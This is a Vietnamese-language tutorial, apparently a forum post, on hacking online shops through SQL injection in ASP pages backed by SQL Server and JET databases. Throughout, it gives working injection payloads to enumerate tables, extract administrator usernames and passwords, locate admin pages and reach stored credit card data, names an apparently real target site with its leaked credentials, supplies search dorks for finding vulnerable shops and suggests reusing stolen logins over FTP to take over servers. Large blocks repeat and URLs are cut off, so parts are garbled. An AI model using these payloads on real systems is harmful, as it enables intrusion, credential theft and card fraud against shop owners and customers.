ta được như thế này
xxxxxx.victim.com/shopping/shopd…from%20informa[/url] tion_schema.tables))–sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
bạn xoá dấu ‘ rồi thêm dòng query này vào phía sau
ta được như thế này
xxxxxx.victim.com/shopping/shopd…from%20informa[/url] tion_schema.tables))–sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ver_Faq’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ver_Faq’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả ‘ver_Faq’ là tên của
table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :and
1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in (’ver_Faq’)))–sp_password
ta được thế
nayxxxxxhttp://www.victim.com/shopping/shopd…from%20informa
tion_schema.tables%20where%20table_name%20not%20in %20(’ver_Faq’)))–sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘coupons’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘coupons’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Ta cứ lấy tiếp như vậy :
xxxxxx.victim.com/shopping/shopd…%201=convert(i[/url]
nt,(select%20top%201%20table_name%20from%20informa
tion_schema.tables%20where%20table_name%20not%20in
%20(’ver_Faq’,’coupons’)))–sp_password
Bước II : lấy column mục đích của
chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các
table : users, tbluser,AdminUsers……….Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’)))–sp_password
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’)))–sp_password
ta được thế
nayxxx.victim.com/shopping/shopd…cts.asp?id=153 and 1=convert(int,(select top 1
column_ name from information_schema.columns where
table_name=(’tbluser’)))–sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldauto’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldauto’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo:and
1=convert(int,(select top 1 column_ name from information_schema.columns where
table_name=(’tbluser’) and column_name not in (’fldauto’)))–sp_password
Khi thêm code xong sẽ như thế này:
xxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’))) –sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldusername’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Khi thêm code xong sẽ như thế này:
xxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’))) –sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldusername’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo :and
1=convert(int,(select top 1 column_name from information_schema.columns where
table_name=(’tbluser’) and column_name not in
(’fldauto’,’fldusername’)))–sp_password
[xxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’,’f ldusername’)))–sp_password
[xxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’,’f ldusername’)))–sp_password
Trích
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Ok được rồi, giờ ta lấy username
và password :
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93———-> username là admin
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93———-> username là admin
_Lấy password :
and 1=convert(int,(select top 1 fldpassword from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93———-> pass là 1234
and 1=convert(int,(select top 1 fldpassword from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93———-> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
and 1=convert(int,(select top 1 fldusername%2b’/’%2bfldpassword from tbluser))–sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin/1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
and 1=convert(int,(select top 1 fldusername%2b’/’%2bfldpassword from tbluser))–sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin/1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể
tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin
admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao
? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column ‘fldpassword’ mà không biết nó ở đâu .Ta thử search tại Table đầu tiên ‘ver_Faq’
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’ver_Faq’) and column_name like (’%25pass%25′)))–sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ “pass”
Trích :
No products match your search
Oh vậy là table ‘ver_Faq’ ko có column nào mà tên của nó có chứa chữ “pass” .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Giả sử ta cần tìm column ‘fldpassword’ mà không biết nó ở đâu .Ta thử search tại Table đầu tiên ‘ver_Faq’
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’ver_Faq’) and column_name like (’%25pass%25′)))–sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ “pass”
Trích :
No products match your search
Oh vậy là table ‘ver_Faq’ ko có column nào mà tên của nó có chứa chữ “pass” .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III:
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
xxxxvictim.com/shopping/shopd…cts.asp?id=153[/url]
Thì link admin có thể nằm ở
[urlxxxx.victim.com/shopping/shopadmin.asp[/url] Hoặcxxxx.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b’/’%2bfieldvalue from configuration where fieldname=’xadminpage’))–sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘xadminpage/5h0padm1n.asp’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Phần II:
hack các shop jetdatabase
Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
xxx.treasureshidden.com/shopp…ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn ‘
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′
ok báo lỗi rồi
9′ Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé ———–> Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ‘ nhé )
Câu lệnh như sau :
union select 1 from tbluser”having 1=1–sp_password
—->xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
————-%————–chú thích————-%—————-
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9′%’union select 1 from tbluser”having 1=1–sp_password and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ‘ xem sao
————————————————————————————-
Tiếp tục nhé
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error ‘80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2 from tbluser”having 1=1–sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error ‘80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
xxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3 from tbluser”having 1=1–sp_password
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4 from tbluser”having 1=1–sp_password
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5 from tbluser”having 1=1–sp_password
…………………..
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser”having 1=1–sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
xxxxvictim.com/shopping/shopd…cts.asp?id=153[/url]
Thì link admin có thể nằm ở
[urlxxxx.victim.com/shopping/shopadmin.asp[/url] Hoặcxxxx.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b’/’%2bfieldvalue from configuration where fieldname=’xadminpage’))–sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘xadminpage/5h0padm1n.asp’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Phần II:
hack các shop jetdatabase
Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
xxx.treasureshidden.com/shopp…ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn ‘
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′
ok báo lỗi rồi
9′ Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé ———–> Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ‘ nhé )
Câu lệnh như sau :
union select 1 from tbluser”having 1=1–sp_password
—->xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
————-%————–chú thích————-%—————-
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9′%’union select 1 from tbluser”having 1=1–sp_password and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ‘ xem sao
————————————————————————————-
Tiếp tục nhé
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error ‘80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2 from tbluser”having 1=1–sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error ‘80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
xxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3 from tbluser”having 1=1–sp_password
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4 from tbluser”having 1=1–sp_password
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5 from tbluser”having 1=1–sp_password
…………………..
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser”having 1=1–sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
18Please review these other
products:
—————————-Chú thích—————————–
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 ——-> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 —–> thêm đến47
line 468 ——> thêm 47
line 469 ——-> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ……( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
————————————————————————-
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser”having 1=1–sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
—————————-Chú thích—————————–
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 ——-> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 —–> thêm đến47
line 468 ——> thêm 47
line 469 ——-> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ……( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
————————————————————————-
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser”having 1=1–sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
18Please review these other
products:
——————————-
harvey
click to see moreboha216322
——————————-
harvey
click to see moreboha216322
18Please review these other
products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
Please review these other
products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b’/’%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser”having 1=1–sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh….asp?cat=9′
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://httpxxxx.treasureshidden.com/…/shopadmin.asp
http://xxxxx.treasureshidden.com/sho…shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration”having 1=1–sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
————-<%>————-<%>——————————————
shopdisplayproducts.asp?id=1′lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20″table”%27
“union select 1 from “table”‘
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 — 56line184 — 47,43,53line188 — 53,56line191 — 48line185 — 86,43line202 — 84,91line208 — 48,57line64 — 53line211,187 — 43line59 — 70……..
sơ bộ vậy thôi…….( các pác cũng có thể xài tool wis and wed của dora để hack….nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được……trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả…..vậy phải làm sao đây…..
uh. vậy là nó đã fix!bó tay sao…….không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp…….ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 –> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b’/’%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser”having 1=1–sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh….asp?cat=9′
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://httpxxxx.treasureshidden.com/…/shopadmin.asp
http://xxxxx.treasureshidden.com/sho…shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration”having 1=1–sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
————-<%>————-<%>——————————————
shopdisplayproducts.asp?id=1′lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20″table”%27
“union select 1 from “table”‘
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 — 56line184 — 47,43,53line188 — 53,56line191 — 48line185 — 86,43line202 — 84,91line208 — 48,57line64 — 53line211,187 — 43line59 — 70……..
sơ bộ vậy thôi…….( các pác cũng có thể xài tool wis and wed của dora để hack….nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được……trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả…..vậy phải làm sao đây…..
uh. vậy là nó đã fix!bó tay sao…….không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp…….ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 –> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
nó ra một cái bảncó số 3hehe!lấy
user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b’/’% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy……….hixhix….khó rồi đây……..bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta…ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname=’xadminpage’
——>shoptellafriend.asp?id=1 union select fieldname=’xadminpage’,2,fieldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration’
ở file shopexd.asp cũng như vậy….
———————-<%>—————<%>———————–
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu “may mắn” (<—-lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu ‘): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ‘ hoặc xoá nó đi khi ta query………
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:”vp-asp shopping” inurl :”.asp?id=”
intext:”products” inurl:”.asp?id=”
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó…chúc may mắn ()
Hack vui vẻ nha.
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b’/’% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy……….hixhix….khó rồi đây……..bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta…ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname=’xadminpage’
——>shoptellafriend.asp?id=1 union select fieldname=’xadminpage’,2,fieldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration’
ở file shopexd.asp cũng như vậy….
———————-<%>—————<%>———————–
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu “may mắn” (<—-lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
